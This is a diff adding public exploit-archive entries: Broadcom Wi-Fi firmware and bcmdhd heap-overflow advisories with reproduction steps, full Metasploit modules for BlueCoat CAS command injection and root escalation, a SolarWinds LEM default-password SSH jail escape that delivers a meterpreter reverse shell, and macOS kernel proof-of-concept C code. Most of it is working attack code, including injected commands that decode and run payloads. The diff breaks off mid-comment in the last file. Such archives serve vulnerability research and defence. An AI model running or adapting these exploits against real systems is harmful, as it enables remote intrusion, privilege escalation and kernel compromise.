//Fast-Transition IE + +As can be seen above, although the function verifies that the RSN IE's length does not exceed the allocated buffer (line 13), it fails to verify that the subsequent IEs also do not overflow the buffer. As such, setting the RSN IE's length to a large value (i.e., such that rsn_ie[1] + 2 + (pos - buffer) == 0xFF) will cause the Timeout Interval and Fast Transition IEs to be copied out-of-bounds, overflowing the buffer. + +It should be noted that prior to calculating the MIC, the function in charge of processing the TDLS Setup Confirm frame calls a helper function in order to verify the nonce values in the FTIE (to make sure they match the nonces in the TDLS Setup Request and TDLS Setup Response frames, M1 & M2). However, since the attacker is the initiator of the TDLS connection, they may choose the value of Snonce (bytes [52-84) of the FTIE) arbitrarily. This leaves only the Anonce (bytes [20-52) of the FTIE) as uncontrolled bytes during the overflow, since they are chosen by the responder. + +It should also be noted that the heap implementation used in the BCM firmware does not perform safe unlinking or include heap header cookies, allowing heap overflows such as the one described above to be exploited more reliably. + +I'm attaching a patch to wpa_supplicant 2.6 which modifies the TDLS Setup Confirm frame sent by the supplicant in order to trigger the heap overflow. You can reproduce the issue by following these steps: + + 1. Download wpa_supplicant 2.6 from https://w1.fi/releases/wpa_supplicant-2.6.tar.gz + 2. Apply the included patch file + 3. Build wpa_supplicant (with TDLS support) + 4. Use wpa_supplicant to connect to a network + 5. Connect to wpa_cli: + 5.1. Setup a TDLS connection to the BCM peer using "TDLS_SETUP " + +(Where MAC_ADDRESS_OF_PEER is the MAC address of a peer with a BCM SoC which is associated to the same network). + +At this point the heap overflow will be triggered. The code in the patch will corrupt the heap, causing the remote BCM SoC to reset after a while. + +I've been able to verify this vulnerability on the BCM4339 chip, running version 6.37.34.40 (as present on the Nexus 5). However, I believe this vulnerability's scope includes a wider range of Broadcom SoCs and versions. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41806.zip diff --git a/platforms/hardware/remote/41805.txt b/platforms/hardware/remote/41805.txt new file mode 100755 index 000000000..a2c8c5185 --- /dev/null +++ b/platforms/hardware/remote/41805.txt @@ -0,0 +1,133 @@ +Source: +https://bugs.chromium.org/p/project-zero/issues/detail?id=1046 +https://googleprojectzero.blogspot.ca/2017/04/over-air-exploiting-broadcoms-wi-fi_4.html + +Broadcom produces Wi-Fi HardMAC SoCs which are used to handle the PHY and MAC layer processing. These chips are present in both mobile devices and Wi-Fi routers, and are capable of handling many Wi-Fi related events without delegating to the host OS. + +One of the events handled by the BCM firmware is the processing of TDLS connections (802.11z). TDLS connections allow clients to exchange data between one another without passing it through the AP (thus preventing congestion at the AP). + +In order to verify the integrity of TDLS messages, each message exchanged between the TDLS peers includes a message integrity code (MIC). The MIC is calculated using AES-CMAC with a key derived during the setup process (TPK-KCK). + +When a TDLS Teardown Request frame is sent by either one of the peers in an established TDLS connection, the receiving client must verify the MIC before processing the request. The MIC for TDLS teardown requests is calculated as follows: + +AES-CMAC(TPK-KCK, LinkID-IE || ReasonCode || DialogToken || TransactionSeq || FastTransition-IE) + +(see "wpa_tdls_key_mic_teardown" under https://w1.fi/cgit/hostap/plain/src/rsn_supp/tdls.c) + +It should be noted that all TDLS connections are accepted automatically from any peer and are handled solely by the BCM firmware (meaning there is no need for user interaction or involvement in any way - once a TDLS Setup Request is received by the firmware, it will proceed with the TDLS handshake and subsequently create a TDLS connection with the requesting peer). + +When the BCM firmware receives a TDLS Teardown frame, it first verifies the Link-ID information element in order to make sure it matches the current link information. Then, if the Link ID is valid, it calls the "wlc_tdls_cal_teardown_mic_chk" function in order to verify the MIC of the request. The function starts by extracting the Fast Transition IE information element (FTIE - number 55). Then, if the IE is present, its contents are copied into a heap-allocated buffer of length 256. The copy is performed using the length field present in the IE, and at a fixed offset from the buffer's start address. Since the length of the FTIE is not verified prior to the copy, this allows an attacker to include a large FTIE (e.g., with a length field of 255), causing the memcpy to overflow the heap-allocated buffer. + +Here's the high-level logic of the "wlc_tdls_cal_teardown_mic_chk" function: + +uint8_t* buffer = malloc(256); +... +uint8_t* linkid_ie = bcm_parse_tlvs(..., 101); +memcpy(buffer, linkid_ie, 0x14); +... +uint8_t* ft_ie = bcm_parse_tlvs(..., 55); +memcpy(buf + 0x18, ft_ie, ft_ie[1] + 2); + +(Note that each IE is a TLV; the tag and value fields are each a single byte long. Therefore, ft_ie[1] is the IE's length field). + +It should also be noted that the heap implementation used in the BCM firmware does not perform safe unlinking or include heap header cookies, allowing heap overflows such as the one described above to be exploited more reliably. + +I'm attaching a patch to wpa_supplicant 2.6 which modifies the TDLS Teardown frame sent by the supplicant in order to trigger the heap overflow. You can reproduce the issue by following these steps: + + 1. Download wpa_supplicant 2.6 from https://w1.fi/releases/wpa_supplicant-2.6.tar.gz + 2. Apply the included patch file + 3. Build wpa_supplicant (with TDLS support) + 4. Use wpa_supplicant to connect to a network + 5. Connect to wpa_cli: + 5.1. Setup a TDLS connection to the BCM peer using "TDLS_SETUP " + 5.2. Teardown the connection using "TDLS_TEARDOWN " + +(Where MAC_ADDRESS_OF_PEER is the MAC address of a peer with a BCM SoC which is associated to the same network). + +At this point the heap overflow will be triggered. The code in the patch will corrupt the heap, causing the remote BCM SoC to reset after a while. + +I've been able to verify this vulnerability on the BCM4339 chip, running version 6.37.34.40 (as present on the Nexus 5). However, I believe this vulnerability's scope includes a wider range of Broadcom SoCs and versions. + +patch + +################################################################################ + +Attaching exploit - running exploit.py results in arbitrary code-execution on the Wi-Fi dongle. + +Here is a high-level overview of the exploit: + + 1. Create a TDLS connection to the target device + 2. Teardown the connection using a crafted "TDLS Teardown Request" frame, triggering the overflow + 3. Create a new TDLS connection, using crafted arguments causing a situation where two chunks in + the freelist overlap one another + 4. Send a TDLS frame with action code 127 + 4.1. Craft the size of the TDLS frame s.t. it overlaps the other chunk in the freelist + 4.2. Craft the contents in order to point the free chunk to the location of a periodic timer + which was created during the firmware's initialization + 5. Send another TDLS frame with action code 127 + 5.1. Craft the size of the TDLS frame s.t. it will be placed on top of the timer object + 5.2. Craft the contents in order to replace the timer's data structures, allowing us to point + the timer's handler function at any arbitrary address. In this case, we point the handler + function at an address near the heap's end + 6. Send a large TDLS frame with action code 127 + 6.1. Craft the frame's contents so that it contains the shellcode we'd like to execute + 7. Since the heap is zero-initialized, and "00 00" is NOP (MOVS R0,R0) in Thumb, this means that + jumping to a location slightly before our created code chunk is fine, as it won't cause any + adverse affects until we reach our code blob. Putting all this together, Once the timer + expires, our code chunk is executed on the firmware + +Note that sending crafted "TDLS Teardown Request" frames requires modifications to wpa_supplicant. +Moreover, sending TDLS frames with action code 127 requires modifications to both wpa_supplicant +and to the Linux Kernel (mac80211). + +These changes (and instructions on how to apply them) are included in the exploit archive attached +to this comment. + +TDLSExploit-1.tar.gz + +################################################################################ + +Attaching updated exploits for both the Nexus 5 (MRA58K, BCM4339 6.37.34.40) and the Nexus 6P (NUF26K, BCM4358 version 7.112.201.1). + +TDLSExploit-2.tar.gz + +################################################################################ + +Adding firmware heap visualisers. + + -create_dot_graph.py - Creates a "dot" graph containing the heap's free-chunks + -create_html_main_chunk.py - Creates an HTML visualisation of the heap's main region + -create_html_total.py - Created an HTML visualisation of the entire heap + -create_trace_html.py - Creates an HTML visualisation for traces from the malloc/free patches + -profiles.py - The symbols for each firmware "profile" + -utils.py - Utilities related to handling a firmware snapshot + +BCMHeapVisualisers.tar.gz + +################################################################################ + +Adding script to dump the timer list from a firmware snapshot. + +dump_timers.py + +################################################################################ + +Adding script to dump PCI ring information from firmware snapshot. + +dump_pci.py + +################################################################################ + +Adding inline firmware patcher. + + -patch.py - The patcher itself. + -apply_* - Scripts to apply each of the patches using dhdutil + -/BCMFreePatch - Patch for the "free" function in the firmware + -/BCMMallocPatch - Patch for the "malloc" function in the firmware + -/BCMDumpMPU - Patch that dumps the MPU's contents + +BCMPatcher.tar.gz + + +Proofs of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41805.zip \ No newline at end of file diff --git a/platforms/hardware/remote/41808.txt b/platforms/hardware/remote/41808.txt new file mode 100755 index 000000000..5b0ce3cec --- /dev/null +++ b/platforms/hardware/remote/41808.txt @@ -0,0 +1,60 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1061 + +Broadcom produces Wi-Fi HardMAC SoCs which are used to handle the PHY and MAC layer processing. These chips are present in both mobile devices and Wi-Fi routers, and are capable of handling many Wi-Fi related events without delegating to the host OS. On Android devices, the "bcmdhd" driver is used in order to communicate with the Wi-Fi SoC (also referred to as "dongle"). + +When the dongle wishes to notify the host OS of an event, it does so by encoding a special "packet" and transmitting it to the host. These packets have an ether type of 0x886C (referred to as ETHER_TYPE_BRCM), and do not contain actual packet data, but rather encapsulate information about events which must be handled by the driver. + +After reading packets from the SDIO interface, the "bcmdhd" driver calls the function "dhd_rx_frame" to handle each of the received frames. If a frame has the special Broadcom ether type, it is passed on to an internal handling function, "dhd_wl_host_event". This function inspects the event code, and passes it onto the registered handlers for the given event type. + +The function "wl_notify_gscan_event" is the registered handler for events of the following types: + -WLC_E_PFN_BEST_BATCHING + -WLC_E_PFN_SCAN_COMPLETE + -WLC_E_PFN_GSCAN_FULL_RESULT + -WLC_E_PFN_SWC + -WLC_E_PFN_BSSID_NET_FOUND + -WLC_E_PFN_BSSID_NET_LOST + -WLC_E_PFN_SSID_EXT + -WLC_E_GAS_FRAGMENT_RX +(for reference, see "wl_init_event_handler") + +Specifically, when the event code "WLC_E_PFN_SWC" is received, the gscan handler function calls "dhd_handle_swc_evt" in order to process the event's data, like so: + +1. void * dhd_handle_swc_evt(dhd_pub_t *dhd, const void *event_data, int *send_evt_bytes) +2. { +3. ... +4. wl_pfn_swc_results_t *results = (wl_pfn_swc_results_t *)event_data; +5. ... +6. gscan_params = &(_pno_state->pno_params_arr[INDEX_OF_GSCAN_PARAMS].params_gscan); +7. ... +8. if (!params->results_rxed_so_far) { +9. if (!params->change_array) { +10. params->change_array = (wl_pfn_significant_net_t *) +11. kmalloc(sizeof(wl_pfn_significant_net_t) * results->total_count, GFP_KERNEL); +12. ... +13. } +14. } +15. ... +16. change_array = ¶ms->change_array[params->results_rxed_so_far]; +17. memcpy(change_array, results->list, sizeof(wl_pfn_significant_net_t) * results->pkt_count); +18. params->results_rxed_so_far += results->pkt_count; +19. ... +20. } + +(where "event_data" is the arbitrary data encapsulated in the event passed in from the dongle) + +When the function above is first invoked, the value of "params->change_array" is NULL. An attacker controlling the dongle may send a crafted WLC_E_PFN_SWC event, with the following values: + + - results->total_count = SMALL_VALUE + - result->pkt_count = LARGE_VALUE + +Since the function fails to verify that "pkt_count" is not larger than "total_count", this would cause the allocated buffer (lines 10-11) to be smaller than the size used in the memcpy operation (line 17), thus overflowing the buffer. + +I've been able to statically verify these issues on the "bcmdhd-3.10" driver, and in the corresponding "bcmdhd" driver on the Nexus 6P's kernel (angler). + +Adding sample EtherType exploit which achieves kernel code execution on the Nexus 5. + +This exploit uses scapy-fakeap to broadcast a dummy network. The exploit starts the attack once a client with the target MAC connects to the network and sends an ARP request. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41808.zip diff --git a/platforms/linux/local/41786.rb b/platforms/linux/local/41786.rb new file mode 100755 index 000000000..e93137e15 --- /dev/null +++ b/platforms/linux/local/41786.rb @@ -0,0 +1,126 @@ +# Exploit Title: OS Command Injection Vulnerability in BlueCoat ASG and CAS +# Date: April 3, 2017 +# Exploit Authors: Chris Hebert, Peter Paccione and Corey Boyd +# Contact: chrisdhebert[at]gmail.com +# Vendor Security Advisory: https://bto.bluecoat.com/security-advisory/sa138 +# Version: CAS 1.3 prior to 1.3.7.4 & ASG 6.6 prior to 6.6.5.4 are vulnerable +# Tested on: BlueCoat CAS 1.3.7.1 +# CVE : cve-2016-9091 + +Timeline: +-------- +08/31/2016 (Vulnerablities Discovered) +03/31/2017 (Final Vendor Patch Confirmed) +04/03/2017 (Public Release) + +Description: +The BlueCoat ASG and CAS management consoles are susceptible to a privilege escalation vulnerablity. +A malicious user with tomcat privileges can escalate to root via the vulnerable mvtroubleshooting.sh script. + +Proof of Concept: + +Metasploit Module - root priv escalation (via mvtroubleshooting.sh) +----------------- +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'rex' +require 'msf/core/exploit/local/linux' +require 'msf/core/exploit/exe' + + +class Metasploit4 < Msf::Exploit::Local + Rank = AverageRanking + + include Msf::Exploit::EXE + include Msf::Post::File + include Msf::Exploit::Local::Linux + + def initialize(info={}) + super( update_info( info, { + 'Name' => 'BlueCoat CAS 1.3.7.1 tomcat->root privilege escalation (via mvtroubleshooting.sh)', + 'Description' => %q{ + This module abuses the sudo access granted to tomcat and the mvtroubleshooting.sh script to escalate + privileges. In order to work, a tomcat session with access to sudo on the sudoers + is needed. This module is useful for post exploitation of BlueCoat + vulnerabilities, where typically web server privileges are acquired, and this + user is allowed to execute sudo on the sudoers file. + }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'Chris Hebert ', + 'Pete Paccione ', + 'Corey Boyd ' + ], + 'DisclosureDate' => 'Vendor Contacted 8-31-2016', + 'References' => + [ + ['EDB', '##TBD##'], + ['CVE', '2016-9091' ], + ['URL', 'http://https://bto.bluecoat.com/security-advisory/sa138'] + ], + 'Platform' => %w{ linux unix }, + 'Arch' => [ ARCH_X86 ], + 'SessionTypes' => [ 'shell', 'meterpreter' ], + 'Targets' => + [ + [ 'Linux x86', { 'Arch' => ARCH_X86 } ] + ], + 'DefaultOptions' => { "PrependSetresuid" => true, "WfsDelay" => 2 }, + 'DefaultTarget' => 0, + } + )) + register_options([ + OptString.new("WritableDir", [ false, "A directory where we can write files", "/var/log" ]), + ], self.class) + end + + def check + id=cmd_exec("id -un") + if id!="tomcat" + print_status("#{peer} - ERROR - Session running as id= #{id}, but must be tomcat") + fail_with(Failure::NoAccess, "Session running as id= #{id}, but must be tomcat") + end + + clprelease=cmd_exec("cat /etc/clp-release | cut -d \" \" -f 3") + if clprelease!="1.3.7.1" + print_status("#{peer} - ERROR - BlueCoat version #{clprelease}, but must be 1.3.7.1") + fail_with(Failure::NotVulnerable, "BlueCoat version #{clprelease}, but must be 1.3.7.1") + end + + return Exploit::CheckCode::Vulnerable + end + def exploit + print_status("#{peer} - Checking for vulnerable BlueCoat session...") + if check != CheckCode::Vulnerable + fail_with(Failure::NotVulnerable, "FAILED Exploit - BlueCoat not running as tomcat or not version 1.3.7.1") + end + + print_status("#{peer} - Running Exploit...") + exe_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(3 + rand(5))}.elf" + write_file(exe_file, generate_payload_exe) + cmd_exec "chmod +x #{exe_file}" + + begin + #Backup original nscd init script + cmd_exec "/usr/bin/sudo /opt/bluecoat/avenger/scripts/mv_troubleshooting.sh /etc/init.d/nscd /data/bluecoat/avenger/ui/logs/tro$ + #Replaces /etc/init.d/nscd script with meterpreter payload + cmd_exec "/usr/bin/sudo /opt/bluecoat/avenger/scripts/mv_troubleshooting.sh #{exe_file} /data/bluecoat/avenger/ui/logs/troubles$ + #Executes meterpreter payload as root + cmd_exec "/usr/bin/sudo /opt/bluecoat/avenger/scripts/flush_dns.sh" + #note, flush_dns.sh waits for payload to exit. (killing it falls over to init pid=1) + ensure + #Restores original nscd init script + cmd_exec "/usr/bin/sudo /opt/bluecoat/avenger/scripts/mv_troubleshooting.sh /var/log/nscd.backup /data/bluecoat/avenger/ui/logs$ + #Remove meterpreter payload (precautionary as most recent mv_troubleshooting.sh should also remove it) + cmd_exec "/bin/rm -f #{exe_file}" + end + print_status("#{peer} - The exploit module has finished") + #Maybe something here to deal with timeouts?? noticied inconsistant.. Exploit failed: Rex::TimeoutError Operation timed out. + + end +end + diff --git a/platforms/linux/remote/41785.rb b/platforms/linux/remote/41785.rb new file mode 100755 index 000000000..8dd323d4c --- /dev/null +++ b/platforms/linux/remote/41785.rb @@ -0,0 +1,197 @@ +# Exploit Title: OS Command Injection Vulnerability in BlueCoat ASG and CAS +# Date: April 3, 2017 +# Exploit Authors: Chris Hebert, Peter Paccione and Corey Boyd +# Contact: chrisdhebert[at]gmail.com +# Vendor Security Advisory: https://bto.bluecoat.com/security-advisory/sa138 +# Version: CAS 1.3 prior to 1.3.7.4 & ASG 6.6 prior to 6.6.5.4 are vulnerable +# Tested on: BlueCoat CAS 1.3.7.1 +# CVE : cve-2016-9091 + +Timeline: +-------- +08/31/2016 (Vulnerablities Discovered) +03/31/2017 (Final Vendor Patch Confirmed) +04/03/2017 (Public Release) + +Description: +The BlueCoat ASG and CAS management consoles are susceptible to an OS command injection vulnerability. +An authenticated malicious administrator can execute arbitrary OS commands with the privileges of the tomcat user. + +Proof of Concept: + +Metasploit Module - Remote Command Injection (via Report Email) +----------------- + +## +# This module requires Metasploit: http://metasploit.com/download +## Current source: https://github.com/rapid7/metasploit-framework +### + +require 'msf/core' + +class Metasploit4 < Msf::Exploit::Remote + Rank = AverageRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => "BlueCoat CAS 1.3.7.1 \"Report Email\" Command Injection", + 'Description' => %q{ + BlueCoat CAS 1.3.7.1 (and possibly previous versions) are susceptible to an authenticated Remote Command Injection attack against + the Report Email functionality. This module exploits the vulnerability, resulting in tomcat execute permissions. + Any authenticated user within the 'administrator' group is able to exploit this; however, a user within the 'Readonly' group cannot. + }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'Chris Hebert ', + 'Pete Paccione ', + 'Corey Boyd ' + ], + 'DisclosureDate' => 'Vendor Contacted 8-31-2016', + 'Platform' => %w{ linux unix }, + 'Targets' => + [ + ['BlueCoat CAS 1.3.7.1', {}], + ], + 'DefaultTarget' => 0, + + 'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD ], + 'SessionTypes' => [ 'shell', 'meterpreter' ], + 'Payload' => + { + 'BadChars' => '', + 'Compat' => + { + #'PayloadType' => 'cmd python cmd_bash cmd_interact', + #'RequiredCmd' => 'generic perl python openssl bash awk', # metasploit may need to fix [bash,awk] + } + }, + 'References' => + [ + ['CVE', '2016-9091'], + ['EDB', '##TBD##'], + ['URL', 'https://bto.bluecoat.com/security-advisory/sa138'] + ], + 'DefaultOptions' => + { + 'SSL' => true + }, + 'Privileged' => true)) + + register_options([ + Opt::RPORT(8082), + OptString.new('USERNAME', [ true, 'Single username' ]), + OptString.new('PASSWORD', [ true, 'Single password' ]) + ], self.class) + end + + #Check BlueCoat CAS version - unauthenticated via GET /avenger/rest/version + def check + res = send_request_raw({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'avenger', 'rest', 'version') + }) + + clp_version = res.body.split("\<\/serialNumber\>\") + clp_version = clp_version[1] + clp_version = clp_version.split("\<") + clp_version = clp_version[0] + if res and clp_version != "1.3.7.1" + print_status("#{peer} - ERROR - BlueCoat version #{clp_version}, but must be 1.3.7.1") + fail_with(Failure::NotVulnerable, "BlueCoat version #{clp_version}, but must be 1.3.7.1") + end + return Exploit::CheckCode::Vulnerable + end + def exploit + print_status("#{peer} - Checking for vulnerable BlueCoat Host...") + if check != CheckCode::Vulnerable + fail_with(Failure::NotVulnerable, "FAILED Exploit - BlueCoat not version 1.3.7.1") + end + + print_status("#{peer} - Running Exploit...") + post = { + 'username' => datastore['USERNAME'], + 'password' => datastore['PASSWORD'] + } + + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, 'cas', 'v1', 'tickets'), + 'method' => 'POST', + 'vars_post' => post + }) + + unless res && res.code == 201 + print_error("#{peer} - Server did not respond in an expected way") + return + end + + redirect = res.headers['Location'] + ticket1 = redirect.split("\/tickets\/").last + print_status("#{peer} - Step 1 - REQ:Login -> RES:Ticket1 -> #{ticket1}") + + post = { + 'service' => 'http://localhost:8447/avenger/j_spring_cas_security_check' + } + + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, 'cas', 'v1', 'tickets', "#{ticket1}"), + 'method' => 'POST', + 'vars_post' => post + }) + + ticket2 = res.body + print_status("#{peer} - Step 2 - REQ:Ticket1 -> RES:Ticket2 -> #{ticket2}") + + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, "avenger/j_spring_cas_security_check?dc=1472496573838&ticket=#{ticket2}") + }) + + unless res && res.code == 302 + print_error("#{peer} - Server did not respond in an expected way") + return + end + cookie = res.get_cookies + print_status("#{peer} - Step 3 - REQ:Ticket2 -> RES:COOKIE -> #{cookie}") + + if cookie.blank? + print_error("#{peer} - Could not retrieve a cookie") + return + end + + unless res && res.code == 302 + print_error("#{peer} - Server did not respond in an expected way") + return + end + + cookie = res.get_cookies + + if cookie.blank? + print_error("#{peer} - Could not retrieve the authenticated cookie") + return + end + + print_status("#{peer} - LOGIN Process Complete ...") + print_status("#{peer} - Exploiting Bluecoat CAS v1.3.7.1 - Report Email ...") + + + if payload.raw.include?("perl") || payload.raw.include?("python") || payload.raw.include?("openssl") + #print_status("#{peer} - DEBUG: asci payload (perl,python, openssl,?bash,awk ") + post = "{\"reportType\":\"jpg\",\"url\":\"http\:\/\/localhost:8447/dev-report-overview.html\;echo #{Rex::Text.encode_base64(payload.raw)}|base64 -d|sh;\",\"subject\":\"CAS #{datastore["RHOST"]}: CAS Overview Report\"}" + else + #print_status("#{peer} - DEBUG - binary payload (meterpreter,etc, !!") + post = "{\"reportType\":\"jpg\",\"url\":\"http\:\/\/localhost:8447/dev-report-overview.html\;echo #{Rex::Text.encode_base64(payload.raw)}|base64 -d>/var/log/metasploit.bin;chmod +x /var/log/metasploit.bin;/var/log/metasploit.bin;\",\"subject\":\"CAS #{datastore["RHOST"]}: CAS Overview Report\"}" + end + + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, 'avenger', 'rest', 'report-email', 'send'), + 'method' => 'POST', + 'cookie' => cookie, + 'ctype' => 'application/json', + 'data' => post + }) + print_status("#{peer} - Payload sent ...") + end + +end + diff --git a/platforms/linux/remote/41795.rb b/platforms/linux/remote/41795.rb new file mode 100755 index 000000000..74c102246 --- /dev/null +++ b/platforms/linux/remote/41795.rb @@ -0,0 +1,164 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::SSH + + def initialize(info={}) + super(update_info(info, + 'Name' => "SolarWind LEM Default SSH Password Remote Code Execution", + 'Description' => %q{ + This module exploits the default credentials of SolarWind LEM. A menu system is encountered when the SSH + service is accessed with the default username and password which is "cmc" and "password". By exploiting a + vulnerability that exist on the menuing script, an attacker can escape from restricted shell. + + This module was tested against SolarWinds LEM v6.3.1. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Mehmet Ince ', # discovery & msf module + ], + 'References' => + [ + ['URL', 'http://pentest.blog/unexpected-journey-4-escaping-from-restricted-shell-and-gaining-root-access-to-solarwinds-log-event-manager-siem-product/'] + ], + 'DefaultOptions' => + { + 'Payload' => 'python/meterpreter/reverse_tcp', + }, + 'Platform' => ['python'], + 'Arch' => ARCH_PYTHON, + 'Targets' => [ ['Automatic', {}] ], + 'Privileged' => false, + 'DisclosureDate' => "Mar 17 2017", + 'DefaultTarget' => 0 + )) + + register_options( + [ + Opt::RPORT(32022), + OptString.new('USERNAME', [ true, 'The username for authentication', 'cmc' ]), + OptString.new('PASSWORD', [ true, 'The password for authentication', 'password' ]), + ] + ) + + register_advanced_options( + [ + OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]), + OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30]) + ] + ) + end + + def rhost + datastore['RHOST'] + end + + def rport + datastore['RPORT'] + end + + def username + datastore['USERNAME'] + end + + def password + datastore['PASSWORD'] + end + + def exploit + factory = ssh_socket_factory + opts = { + :auth_methods => ['keyboard-interactive'], + :port => rport, + :use_agent => false, + :config => false, + :password => password, + :proxy => factory, + :non_interactive => true + } + + opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] + + print_status("#{rhost}:#{rport} - Attempting to login...") + + begin + ssh = nil + ::Timeout.timeout(datastore['SSH_TIMEOUT']) do + ssh = Net::SSH.start(rhost, username, opts) + end + rescue Rex::ConnectionError + return + rescue Net::SSH::Disconnect, ::EOFError + print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation" + return + rescue ::Timeout::Error + print_error "#{rhost}:#{rport} SSH - Timed out during negotiation" + return + rescue Net::SSH::AuthenticationFailed + print_error "#{rhost}:#{rport} SSH - Failed authentication due wrong credentials." + rescue Net::SSH::Exception => e + print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}" + return + end + + if ssh + payload_executed = false + print_good("SSH connection is established.") + + ssh.open_channel do |channel| + print_status("Requesting pty... We need it in order to interact with menuing system.") + + channel.request_pty do |ch, success| + raise ::RuntimeError, "Could not request pty!" unless success + print_good("Pty successfully obtained.") + + print_status("Requesting a shell.") + ch.send_channel_request("shell") do |ch, success| + raise ::RuntimeError, "Could not open shell!" unless success + print_good("Remote shell successfully obtained.") + end + end + + channel.on_data do |ch, data| + if data.include? "cmc " + print_good("Step 1 is done. Managed to access terminal menu.") + channel.send_data("service\n") + end + + if data.include? "service " + print_good("Step 2 is done. Managed to select 'service' sub menu.") + channel.send_data("restrictssh\n") + end + + if data.include? "Press to configure restriction on the SSH service to the Manager Appliance" + print_good("Step 3 is done. Managed to start 'restrictssh' function.") + channel.send_data("*#`bash>&2`\n") + end + + if data.include? "Are the hosts" + print_good("Step 4 is done. We are going to try escape from jail shell.") + channel.send_data("Y\n") + end + + if data.include? "/usr/local/contego" + if payload_executed == false + print_good("Sweet..! Escaped from jail.") + print_status("Delivering payload...") + channel.send_data("python -c \"#{payload.encoded}\"\n") + payload_executed = true + end + end + + end + end + ssh.loop unless session_created? + end + end + +end diff --git a/platforms/macos/dos/41790.c b/platforms/macos/dos/41790.c new file mode 100755 index 000000000..76b61cc68 --- /dev/null +++ b/platforms/macos/dos/41790.c @@ -0,0 +1,102 @@ +/* +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1071 + +Selector 0x921 of IntelFBClientControl ends up in AppleIntelCapriController::GetLinkConfig + +This method takes a structure input and output buffer. It reads an attacker controlled dword from the input buffer which it +uses to index an array of pointers with no bounds checking: + +This pointer is passed to AppleIntelFramebuffer::validateDisplayMode and the uint64 at offset +2130h is used as a C++ object pointer +on which a virtual method is called. With some heap grooming this could be used to get kernel code execution. + +tested on MacOS Sierra 10.12.2 (16C67) +*/ + +// ianbeer + +// build: clang -o capri_exec capri_exec.c -framework IOKit + +#if 0 +MacOS kernel code execution due to lack of bounds checking in AppleIntelCapriController::GetLinkConfig + +Selector 0x921 of IntelFBClientControl ends up in AppleIntelCapriController::GetLinkConfig + +This method takes a structure input and output buffer. It reads an attacker controlled dword from the input buffer which it +uses to index an array of pointers with no bounds checking: + +This pointer is passed to AppleIntelFramebuffer::validateDisplayMode and the uint64 at offset +2130h is used as a C++ object pointer +on which a virtual method is called. With some heap grooming this could be used to get kernel code execution. + +tested on MacOS Sierra 10.12.2 (16C67) +#endif + +#include +#include +#include + +#include + +#include + +int main(int argc, char** argv){ + kern_return_t err; + + io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IntelFBClientControl")); + + if (service == IO_OBJECT_NULL){ + printf("unable to find service\n"); + return 0; + } + + io_connect_t conn = MACH_PORT_NULL; + err = IOServiceOpen(service, mach_task_self(), 0, &conn); + if (err != KERN_SUCCESS){ + printf("unable to get user client connection\n"); + return 0; + } + + uint64_t inputScalar[16]; + uint64_t inputScalarCnt = 0; + + char inputStruct[4096]; + size_t inputStructCnt = 4096; + + uint64_t outputScalar[16]; + uint32_t outputScalarCnt = 0; + + char outputStruct[4096]; + size_t outputStructCnt = 0x1d8; + + for (int step = 1; step < 1000; step++) { + memset(inputStruct, 0, inputStructCnt); + *(uint32_t*)inputStruct = 0x238 + (step*(0x2000/8)); + + outputStructCnt = 4096; + memset(outputStruct, 0, outputStructCnt); + + err = IOConnectCallMethod( + conn, + 0x921, + inputScalar, + inputScalarCnt, + inputStruct, + inputStructCnt, + outputScalar, + &outputScalarCnt, + outputStruct, + &outputStructCnt); + + if (err == KERN_SUCCESS) { + break; + } + + printf("retrying 0x2000 up - %s\n", mach_error_string(err)); + } + + uint64_t* leaked = (uint64_t*)(outputStruct+3); + for (int i = 0; i < 0x1d8/8; i++) { + printf("%016llx\n", leaked[i]); + } + + return 0; +} diff --git a/platforms/macos/dos/41791.c b/platforms/macos/dos/41791.c new file mode 100755 index 000000000..248d433bb --- /dev/null +++ b/platforms/macos/dos/41791.c @@ -0,0 +1,70 @@ +/* +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1104 + +exec_handle_port_actions is responsible for handling the xnu port actions extension to posix_spawn. + +It supports 4 different types of port (PSPA_SPECIAL, PSPA_EXCEPTION, PSPA_AU_SESSION and PSPA_IMP_WATCHPORTS) + +For the special, exception and audit ports it tries to update the new task to reflect the port action +by calling either task_set_special_port, task_set_exception_ports or audit_session_spawnjoin and if +any of those calls fail it calls ipc_port_release_send(port). + +task_set_special_port and task_set_exception_ports don't drop a reference on the port if they fail +but audit_session_spawnjoin (which calls to audit_session_join_internal) *does* drop a reference on +the port on failure. It's easy to make audit_session_spawnjoin fail by specifying a port which isn't +an audit session port. + +This means we can cause two references to be dropped on the port when only one is held leading to a +use after free in the kernel. + +Tested on MacOS 10.12.3 (16D32) on MacBookAir5,2 +*/ + +// ianbeer +#if 0 +MacOS/iOS kernel uaf due to double-release in posix_spawn + +exec_handle_port_actions is responsible for handling the xnu port actions extension to posix_spawn. + +It supports 4 different types of port (PSPA_SPECIAL, 